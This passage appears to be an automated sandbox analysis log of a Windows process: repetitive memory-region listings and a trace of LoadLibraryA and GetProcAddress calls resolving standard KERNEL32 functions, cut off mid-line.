region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 23574 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 23668 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 23669 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 23670 
start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 23671 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 23672 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 23678 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 23679 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 23680 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 23681 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 23682 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 23867 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 23868 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 23869 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 23870 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 23871 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = 
"" Region: id = 23911 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 23912 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 23913 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 23914 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 23915 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24004 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24005 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24006 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24007 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24008 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24014 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24015 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24016 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001c10000" filename = "" Region: id = 24017 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24018 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24093 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24094 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24095 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24096 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24097 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24111 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24112 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24113 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24114 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24115 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24270 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = 
private name = "private_0x00000000002a0000" filename = "" Region: id = 24271 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24272 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24273 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24274 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24275 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24276 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24277 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24278 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24279 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24290 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24291 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24292 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24293 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24294 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24295 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24296 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24297 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24298 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24299 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24385 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24386 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24387 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24388 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24389 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24390 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24391 start_va = 0x1800000 end_va = 0x1c0ffff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24392 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24393 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24394 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24505 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24506 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24507 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24508 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24509 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24511 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24512 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24513 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24514 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24515 start_va = 
0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24616 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24617 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24618 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24619 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24620 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24621 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24622 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24623 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24624 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24625 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24717 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24718 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24719 
start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24720 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24721 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24722 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24723 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24724 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24725 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24726 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 24835 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 24836 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 24837 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 24838 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 24839 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = 
"" Thread: id = 34 os_tid = 0xc18 [0099.581] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0099.581] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0099.581] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0099.582] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0099.583] GetProcAddress (hModule=0x76910000, 
lpProcName="ResumeThread") returned 0x76950f1c [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0099.583] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0099.584] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0099.584] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0099.584] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0099.584] GetProcAddress (hModule=0x76910000, 
lpProcName="GetTickCount") returned 0x7695ba60 [0099.697] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0099.697] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0099.697] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0099.697] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0099.697] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0099.697] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0099.697] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0099.697] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0099.697] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 
[0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0099.698] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0099.699] GetProcAddress (hModule=0x76910000, 
lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0099.699] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0099.699] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0099.699] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0099.700] 
GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0099.700] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0099.701] GetProcAddress (hModule=0x76910000, 
lpProcName="ExitThread") returned 0x7725f611 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0099.701] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0099.702] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0099.702] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0099.702] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0099.702] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0099.702] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0099.702] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0099.702] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0099.702] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0099.702] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0099.702] GetProcAddress 